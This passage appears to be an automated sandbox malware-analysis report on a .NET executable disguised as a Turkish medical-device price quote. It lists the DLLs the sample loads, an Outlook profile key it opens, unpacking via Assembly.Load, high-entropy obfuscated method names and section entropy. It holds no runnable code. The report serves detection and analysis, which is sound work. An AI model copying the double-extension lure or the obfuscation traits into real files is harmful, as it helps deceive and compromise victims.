                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, chcZUZyrDJr55lSd5d.cs.Net Code: BS8tODlYtt System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, chcZUZyrDJr55lSd5d.cs.Net Code: BS8tODlYtt System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, chcZUZyrDJr55lSd5d.cs.Net Code: BS8tODlYtt System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.31afb60.0.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.6360000.5.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_05575D00 push eax; iretd 0_2_05575E09
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_05575E00 push eax; iretd 0_2_05575E09
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_07B2F8E8 push esp; iretd 0_2_07B2F8E9
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic PE information: section name: .text entropy: 7.801975437341518
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, oBXJZxdiv8wFS1Sq6H.csHigh entropy of concatenated method names: 'Sm12Mek7yn', 'tgI2ZZtcxe', 'MY42KJoWNa', 'bUJ2AJcnsZ', 'F3a2mXuJdx', 'dKl2TECwUQ', 'Cr02xnSyjC', 'Fv32wqDOFi', 'UYA2aDSeTV', 'hQe2f5PV34'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, M2G0LvtsEhXNMNChLt.csHigh entropy of concatenated method names: 'ybVX7BXJZx', 'pv8XywFS1S', 'AKaXD7YgEY', 'YivXvVVgk7', 'I7aXVDcDal', 'wWCXiXxRrB', 'UYabwISIhv1pYHAjNq', 'me1rlCcVuJeRHOARc2', 'hCMXXkAaZn', 'CrVXjMQ5lf'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, TGMUkbA0Kbu1msKbsw.csHigh entropy of concatenated method names: 'gM1CDK0T23', 'YMwCvkVk1e', 'ToString', 'KBdCY4UByJ', 'I0RC2UhEH5', 'e9mCGKlKVh', 'yi3CkOlFBv', 'VTAC5TKTG3', 'jZ7C77MwBT', 'DdRCySmkra'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, lalWWCoXxRrB1dKojv.csHigh entropy of concatenated method names: 'x0L5p3A2bN', 'ooA52bmvT5', 'Baj5kg0t09', 'Unn57CrGuD', 'HKK5yOk7Mg', 'N7gkmaxiVD', 'HkpkTF0hYh', 't4ZkxZMPIH', 'Qn0kwUTuuB', 'uFjka4BOEL'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, s6XsfsHKa7YgEYfivV.csHigh entropy of concatenated method names: 'tQZGsd4E2Q', 'UJxGr5sHby', 'KYrGd9q22c', 'fZPGHZ3RPV', 'OcAGVYumKF', 'ctQGicE1vO', 'gDsGCsBlL8', 'KnaGn3enQq', 'PkpGJQyral', 'mPRGgZ2LQG'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, wc2XIuBUuyRX37k0tb.csHigh entropy of concatenated method names: 'ktN7YFvewH', 'J117GBpb84', 'hMl75bmO2Q', 'sjG5f0OoLA', 'a9j5zV2R79', 'AF374JpFtJ', 'Wnv7XtTPWX', 'H017LpNBJn', 'AVk7jKHsPt', 'qGq7tmTSXG'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, SX9YTBX4Fs19bBqFKDk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nXZg1xcaWL', 'BmDgl0wkpW', 'wN0gbGhPiQ', 'bDEgMoeauU', 'flQgZkMaXG', 'GNjgKKDr9F', 'CnHgAy371k'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, Ovv7TxK8SiTZmDE309.csHigh entropy of concatenated method names: 'ToString', 'Lvdi1YNs8x', 'Y2CiNHyVdC', 'aKAiFMyUES', 'Iv4iuSVWSZ', 'TgCi0O2Wm6', 'f6yiQK1pJn', 'PjiiB4tqMk', 'rV0icSNpK6', 'YroiSoDuN0'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, Eg6tbkXXYLdYRflD26p.csHigh entropy of concatenated method names: 'ajhgfWJMYP', 'QYCgzrGUKl', 'rG694LoA6E', 'daj9Xx45Z9', 'qE99LHPwQl', 'xBH9jiBvvY', 'WCV9tX7Wvd', 'PEo9pLpfKD', 'rIm9Y9DGJX', 'XAy92KvxDX'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, ovGAdibW3XVXQYqWOO.csHigh entropy of concatenated method names: 'daMRdgt0r8', 'sMfRHsgDfO', 'fexRoo5Yef', 'jyJRNC9xVY', 'hW3RunJkwe', 'DcqR0fuQyH', 'KHrRB2Pw1N', 'anRRcIivOT', 'Wb3RqSTTUE', 'nJsR1b88Js'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, HRTOxMTE3odfb866U5.csHigh entropy of concatenated method names: 'TtECwM31Hw', 'vTbCf65UYs', 'V90n4yUYV9', 'AOlnXhFpKp', 'HcaC1OVXFo', 'xBdCl20l4O', 'booCbxWPae', 'l1KCMScDMb', 'Ej9CZFDQex', 'D8dCKri3lH'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, wVn35QS6L2AviJCUnX.csHigh entropy of concatenated method names: 'C7c76YtU9R', 'T4g73Glkyk', 'JAm7OKSfTN', 'LNt7sNneIH', 'QLa78Ja7qh', 'GnX7rVEnk4', 'E2n7PtEldC', 'A7v7dqcS1N', 'nmI7H99Xwo', 'UQH7U3DSpm'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, Q92ZEGuR3R0exjdZ2W.csHigh entropy of concatenated method names: 'CuL5evOS9A', 'amE564KOTc', 'x185O37SL8', 'tUW5suQjnw', 'GgN5rGkKPd', 'yV05Pktqhs', 'xx85HoLDRq', 'CQa5UGpBpa', 'KBKX9rYNCPRyoswsU22', 'ARNkAdYmTghI04rHAAN'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, Bvh04s2RPwtMA24VC4.csHigh entropy of concatenated method names: 'Dispose', 'URGXaDZ31B', 'KGfLNFIJC2', 'oL2kaGFCia', 'YkSXfH9CfJ', 'feBXzbn0Ar', 'ProcessDialogKey', 'MZXL4BT5kI', 'q9PLXdKbdo', 'igMLLKlj2q'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, Slj2qPfQHxBUgjbDJa.csHigh entropy of concatenated method names: 'Y0TgGM4kJI', 'kvogkPMryL', 'jLKg5aqY1R', 'DbBg7AyPHw', 'afxgJjCKql', 'P2fgyEyepX', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, OOFLQYze1sefpXqr3a.csHigh entropy of concatenated method names: 'ucHgr4WtCf', 'zRPgddeeeX', 'zMYgHyKsRO', 'KGygombDxn', 'zNigNXvTyu', 'bJJguqxL8m', 'yYrg0K7M3j', 'x3pge1v3SQ', 'QBGg620RuA', 'WLjg309qP4'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, aBT5kIan9PdKbdo5gM.csHigh entropy of concatenated method names: 'sf4Joyiqvf', 'AGTJNC0FmS', 'MkhJFDMk1g', 'MUoJuDSGpH', 'HEgJ0ImxhQ', 'su6JQWgjFG', 'HUGJBQMi0V', 'LLYJc7wE1T', 'CIdJSJDs9p', 'wuwJqR3wpF'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, vS8He9MSluhkl5uLAc.csHigh entropy of concatenated method names: 'BQJVqePRET', 'Cq9VlapZjC', 'zM1VM3y9p2', 'WY0VZMqDUk', 'PNKVNDgUMR', 'OqPVFpWwcV', 'kawVuC65v6', 'iS1V01BaId', 'gNHVQxcHxB', 'coVVBPSiRI'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, fvx3xRxwOmRGDZ31Bf.csHigh entropy of concatenated method names: 'FfiJVHjP4s', 'sM3JCRS2T7', 'cawJJ9sdd7', 'KnvJ9jCyuh', 'o7ZJI9wb9W', 'bTVJeIjoJR', 'Dispose', 'hxgnYxlSFC', 'uKUn2dmIGM', 'KE8nGivjRw'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, xQs4EgLS5JBIGhk6AF.csHigh entropy of concatenated method names: 'qk6Oq6f0d', 'ESFsvkmBp', 'cIcrJ62XR', 's0APGCHVN', 'zBvHwU44p', 'lrjUJIIrG', 'PXCixqlX1YIs6ie8H3', 'sBT9uwqf0auY8SgZ8y', 'dRFCjVUrtg35ttofte', 'qTMn6VW4Y'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.7610000.6.raw.unpack, chcZUZyrDJr55lSd5d.csHigh entropy of concatenated method names: 'pVmjptivra', 'PhBjYGyR5j', 'AQIj2eoBNJ', 'iK0jGAc0cP', 'MNhjk8nMoX', 'Fuij5TcgHv', 'K5gj7WQnj6', 'pQ3jyy5F4W', 'utLjED5kVa', 'soojDlZRrJ'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, oBXJZxdiv8wFS1Sq6H.csHigh entropy of concatenated method names: 'Sm12Mek7yn', 'tgI2ZZtcxe', 'MY42KJoWNa', 'bUJ2AJcnsZ', 'F3a2mXuJdx', 'dKl2TECwUQ', 'Cr02xnSyjC', 'Fv32wqDOFi', 'UYA2aDSeTV', 'hQe2f5PV34'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, M2G0LvtsEhXNMNChLt.csHigh entropy of concatenated method names: 'ybVX7BXJZx', 'pv8XywFS1S', 'AKaXD7YgEY', 'YivXvVVgk7', 'I7aXVDcDal', 'wWCXiXxRrB', 'UYabwISIhv1pYHAjNq', 'me1rlCcVuJeRHOARc2', 'hCMXXkAaZn', 'CrVXjMQ5lf'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, TGMUkbA0Kbu1msKbsw.csHigh entropy of concatenated method names: 'gM1CDK0T23', 'YMwCvkVk1e', 'ToString', 'KBdCY4UByJ', 'I0RC2UhEH5', 'e9mCGKlKVh', 'yi3CkOlFBv', 'VTAC5TKTG3', 'jZ7C77MwBT', 'DdRCySmkra'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, lalWWCoXxRrB1dKojv.csHigh entropy of concatenated method names: 'x0L5p3A2bN', 'ooA52bmvT5', 'Baj5kg0t09', 'Unn57CrGuD', 'HKK5yOk7Mg', 'N7gkmaxiVD', 'HkpkTF0hYh', 't4ZkxZMPIH', 'Qn0kwUTuuB', 'uFjka4BOEL'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, s6XsfsHKa7YgEYfivV.csHigh entropy of concatenated method names: 'tQZGsd4E2Q', 'UJxGr5sHby', 'KYrGd9q22c', 'fZPGHZ3RPV', 'OcAGVYumKF', 'ctQGicE1vO', 'gDsGCsBlL8', 'KnaGn3enQq', 'PkpGJQyral', 'mPRGgZ2LQG'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, wc2XIuBUuyRX37k0tb.csHigh entropy of concatenated method names: 'ktN7YFvewH', 'J117GBpb84', 'hMl75bmO2Q', 'sjG5f0OoLA', 'a9j5zV2R79', 'AF374JpFtJ', 'Wnv7XtTPWX', 'H017LpNBJn', 'AVk7jKHsPt', 'qGq7tmTSXG'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, SX9YTBX4Fs19bBqFKDk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nXZg1xcaWL', 'BmDgl0wkpW', 'wN0gbGhPiQ', 'bDEgMoeauU', 'flQgZkMaXG', 'GNjgKKDr9F', 'CnHgAy371k'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, Ovv7TxK8SiTZmDE309.csHigh entropy of concatenated method names: 'ToString', 'Lvdi1YNs8x', 'Y2CiNHyVdC', 'aKAiFMyUES', 'Iv4iuSVWSZ', 'TgCi0O2Wm6', 'f6yiQK1pJn', 'PjiiB4tqMk', 'rV0icSNpK6', 'YroiSoDuN0'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, Eg6tbkXXYLdYRflD26p.csHigh entropy of concatenated method names: 'ajhgfWJMYP', 'QYCgzrGUKl', 'rG694LoA6E', 'daj9Xx45Z9', 'qE99LHPwQl', 'xBH9jiBvvY', 'WCV9tX7Wvd', 'PEo9pLpfKD', 'rIm9Y9DGJX', 'XAy92KvxDX'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, ovGAdibW3XVXQYqWOO.csHigh entropy of concatenated method names: 'daMRdgt0r8', 'sMfRHsgDfO', 'fexRoo5Yef', 'jyJRNC9xVY', 'hW3RunJkwe', 'DcqR0fuQyH', 'KHrRB2Pw1N', 'anRRcIivOT', 'Wb3RqSTTUE', 'nJsR1b88Js'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, HRTOxMTE3odfb866U5.csHigh entropy of concatenated method names: 'TtECwM31Hw', 'vTbCf65UYs', 'V90n4yUYV9', 'AOlnXhFpKp', 'HcaC1OVXFo', 'xBdCl20l4O', 'booCbxWPae', 'l1KCMScDMb', 'Ej9CZFDQex', 'D8dCKri3lH'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, wVn35QS6L2AviJCUnX.csHigh entropy of concatenated method names: 'C7c76YtU9R', 'T4g73Glkyk', 'JAm7OKSfTN', 'LNt7sNneIH', 'QLa78Ja7qh', 'GnX7rVEnk4', 'E2n7PtEldC', 'A7v7dqcS1N', 'nmI7H99Xwo', 'UQH7U3DSpm'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, Q92ZEGuR3R0exjdZ2W.csHigh entropy of concatenated method names: 'CuL5evOS9A', 'amE564KOTc', 'x185O37SL8', 'tUW5suQjnw', 'GgN5rGkKPd', 'yV05Pktqhs', 'xx85HoLDRq', 'CQa5UGpBpa', 'KBKX9rYNCPRyoswsU22', 'ARNkAdYmTghI04rHAAN'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, Bvh04s2RPwtMA24VC4.csHigh entropy of concatenated method names: 'Dispose', 'URGXaDZ31B', 'KGfLNFIJC2', 'oL2kaGFCia', 'YkSXfH9CfJ', 'feBXzbn0Ar', 'ProcessDialogKey', 'MZXL4BT5kI', 'q9PLXdKbdo', 'igMLLKlj2q'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, Slj2qPfQHxBUgjbDJa.csHigh entropy of concatenated method names: 'Y0TgGM4kJI', 'kvogkPMryL', 'jLKg5aqY1R', 'DbBg7AyPHw', 'afxgJjCKql', 'P2fgyEyepX', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, OOFLQYze1sefpXqr3a.csHigh entropy of concatenated method names: 'ucHgr4WtCf', 'zRPgddeeeX', 'zMYgHyKsRO', 'KGygombDxn', 'zNigNXvTyu', 'bJJguqxL8m', 'yYrg0K7M3j', 'x3pge1v3SQ', 'QBGg620RuA', 'WLjg309qP4'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, aBT5kIan9PdKbdo5gM.csHigh entropy of concatenated method names: 'sf4Joyiqvf', 'AGTJNC0FmS', 'MkhJFDMk1g', 'MUoJuDSGpH', 'HEgJ0ImxhQ', 'su6JQWgjFG', 'HUGJBQMi0V', 'LLYJc7wE1T', 'CIdJSJDs9p', 'wuwJqR3wpF'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, vS8He9MSluhkl5uLAc.csHigh entropy of concatenated method names: 'BQJVqePRET', 'Cq9VlapZjC', 'zM1VM3y9p2', 'WY0VZMqDUk', 'PNKVNDgUMR', 'OqPVFpWwcV', 'kawVuC65v6', 'iS1V01BaId', 'gNHVQxcHxB', 'coVVBPSiRI'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, fvx3xRxwOmRGDZ31Bf.csHigh entropy of concatenated method names: 'FfiJVHjP4s', 'sM3JCRS2T7', 'cawJJ9sdd7', 'KnvJ9jCyuh', 'o7ZJI9wb9W', 'bTVJeIjoJR', 'Dispose', 'hxgnYxlSFC', 'uKUn2dmIGM', 'KE8nGivjRw'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, xQs4EgLS5JBIGhk6AF.csHigh entropy of concatenated method names: 'qk6Oq6f0d', 'ESFsvkmBp', 'cIcrJ62XR', 's0APGCHVN', 'zBvHwU44p', 'lrjUJIIrG', 'PXCixqlX1YIs6ie8H3', 'sBT9uwqf0auY8SgZ8y', 'dRFCjVUrtg35ttofte', 'qTMn6VW4Y'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.42c4458.3.raw.unpack, chcZUZyrDJr55lSd5d.csHigh entropy of concatenated method names: 'pVmjptivra', 'PhBjYGyR5j', 'AQIj2eoBNJ', 'iK0jGAc0cP', 'MNhjk8nMoX', 'Fuij5TcgHv', 'K5gj7WQnj6', 'pQ3jyy5F4W', 'utLjED5kVa', 'soojDlZRrJ'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, oBXJZxdiv8wFS1Sq6H.csHigh entropy of concatenated method names: 'Sm12Mek7yn', 'tgI2ZZtcxe', 'MY42KJoWNa', 'bUJ2AJcnsZ', 'F3a2mXuJdx', 'dKl2TECwUQ', 'Cr02xnSyjC', 'Fv32wqDOFi', 'UYA2aDSeTV', 'hQe2f5PV34'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, M2G0LvtsEhXNMNChLt.csHigh entropy of concatenated method names: 'ybVX7BXJZx', 'pv8XywFS1S', 'AKaXD7YgEY', 'YivXvVVgk7', 'I7aXVDcDal', 'wWCXiXxRrB', 'UYabwISIhv1pYHAjNq', 'me1rlCcVuJeRHOARc2', 'hCMXXkAaZn', 'CrVXjMQ5lf'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, TGMUkbA0Kbu1msKbsw.csHigh entropy of concatenated method names: 'gM1CDK0T23', 'YMwCvkVk1e', 'ToString', 'KBdCY4UByJ', 'I0RC2UhEH5', 'e9mCGKlKVh', 'yi3CkOlFBv', 'VTAC5TKTG3', 'jZ7C77MwBT', 'DdRCySmkra'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, lalWWCoXxRrB1dKojv.csHigh entropy of concatenated method names: 'x0L5p3A2bN', 'ooA52bmvT5', 'Baj5kg0t09', 'Unn57CrGuD', 'HKK5yOk7Mg', 'N7gkmaxiVD', 'HkpkTF0hYh', 't4ZkxZMPIH', 'Qn0kwUTuuB', 'uFjka4BOEL'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, s6XsfsHKa7YgEYfivV.csHigh entropy of concatenated method names: 'tQZGsd4E2Q', 'UJxGr5sHby', 'KYrGd9q22c', 'fZPGHZ3RPV', 'OcAGVYumKF', 'ctQGicE1vO', 'gDsGCsBlL8', 'KnaGn3enQq', 'PkpGJQyral', 'mPRGgZ2LQG'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, wc2XIuBUuyRX37k0tb.csHigh entropy of concatenated method names: 'ktN7YFvewH', 'J117GBpb84', 'hMl75bmO2Q', 'sjG5f0OoLA', 'a9j5zV2R79', 'AF374JpFtJ', 'Wnv7XtTPWX', 'H017LpNBJn', 'AVk7jKHsPt', 'qGq7tmTSXG'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, SX9YTBX4Fs19bBqFKDk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nXZg1xcaWL', 'BmDgl0wkpW', 'wN0gbGhPiQ', 'bDEgMoeauU', 'flQgZkMaXG', 'GNjgKKDr9F', 'CnHgAy371k'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, Ovv7TxK8SiTZmDE309.csHigh entropy of concatenated method names: 'ToString', 'Lvdi1YNs8x', 'Y2CiNHyVdC', 'aKAiFMyUES', 'Iv4iuSVWSZ', 'TgCi0O2Wm6', 'f6yiQK1pJn', 'PjiiB4tqMk', 'rV0icSNpK6', 'YroiSoDuN0'
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.434b478.4.raw.unpack, Eg6tbkXXYLdYRflD26p.csHigh entropy of concatenated method names: 'ajhgfWJMYP', 'QYCgzrGUKl', 'rG694LoA6E', 'daj9Xx45Z9', 'qE99LHPwQl', 'xBH9jiBvvY', 'WCV9tX7Wvd', 'PEo9pLpfKD', 'rIm9Y9DGJX', 'XAy92KvxDX'
